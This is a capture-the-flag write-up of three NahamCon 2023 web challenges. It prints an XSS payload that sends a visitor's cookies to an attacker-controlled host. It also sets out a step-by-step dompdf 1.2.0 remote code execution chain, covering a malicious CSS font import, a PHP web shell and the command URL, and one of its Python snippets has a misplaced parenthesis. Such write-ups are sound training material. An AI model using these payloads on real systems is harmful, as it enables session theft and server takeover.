Nahamcon CTF 2023 - Web

Nahamcon CTF 2023 - Web

The third time we attempted the Nahamcon CTF, we didn't have as much availability as a team, and I ended up jumping on web with 8 hours left.

Web Challenges

Hidden Figures

challenge description

I tried to fuzz the website for common easy stuff then tried to carve out more files from the images.

Here’s how it turned out:

Thank you marioFlag

Star-Wars

challenge description

This was a blog with only one post and a comment functionality. Here’s my go to payload for stealing cookies with xss:

<img src=x onerror=this.src='http://<YOUR_IP>:<YOUR_PORT>/?'+document.cookie;>

Good thinking, because apparently admin will have a look at my comment.

admin will check shortly

receive admin cookie

With this I managed to send myself the admin cookie and simply replaced it in the browser. This revealed an Admin menu and the flag.

flag.txt

Stickers

challenge description

We are met with a form allowing us to generate a pdf file at quote.php, with all the form fields appended in the url.

a form to buy stickersversion dompdf 1.2.0 + CPDF

This pdf was generated with dompdf 1.2.0 + CPDF. I had already downloaded and played with this exploit from github before, from positive-security, so I felt at home, even without a vpn. I just modified the original files with my details as shown below, and served them with ngrok.

😉 winking at htb players.

exploit.css:

@font-face {
    font-family:'exploitfont';
    src:url('ngrokurl/exploit_font.php');
    font-weight:'normal';
    font-style:'normal';
  }

exploit_font.php:

File content available in the github repo
<?php system($_REQUEST['cmd']); ?>

This excellent blog post from optiv.com details very precisely what we’re going to do next. The following payload goes into the url as is, as a value for 'organization=' 

http://challenge.nahamcon.com:31853/quote.php?organization=<link rel=stylesheet href='https://<your-ngrok-url>/exploit.css'>&...

grab md5 hash of your file as does the app

Don’t forget to grab the md5 hash of your file with this command:

echo -n 'https://<your-ngrok-url>/exploit_font.php' | md5sum

or by running this python code as per the article.

import hashlib
hashlib.md5('https://<your-ngrok-url>/exploit_font.php'.encode('UTF-8').hexdigest()

At this point I decided to fuzz the url, to make extra sure I would have the correct file path, and confirmed the environnement had a path /dompdf/lib/fonts/ where my exploit_font would be uploaded, from exploit.css.

Since we decided to add a cmd parameter let’s include it in our url:

http://challenge.nahamcon.com:31853/dompdf/lib/fonts/exploitfont_normal_d3c0075274e23d331a097922d6a22d90.php?cmd=cat%20/flag.txt

We can see the content of the exploit_font.php file with the output of our php (containing the flag).

cat flag.txt

by Starry-Lord 18.06.23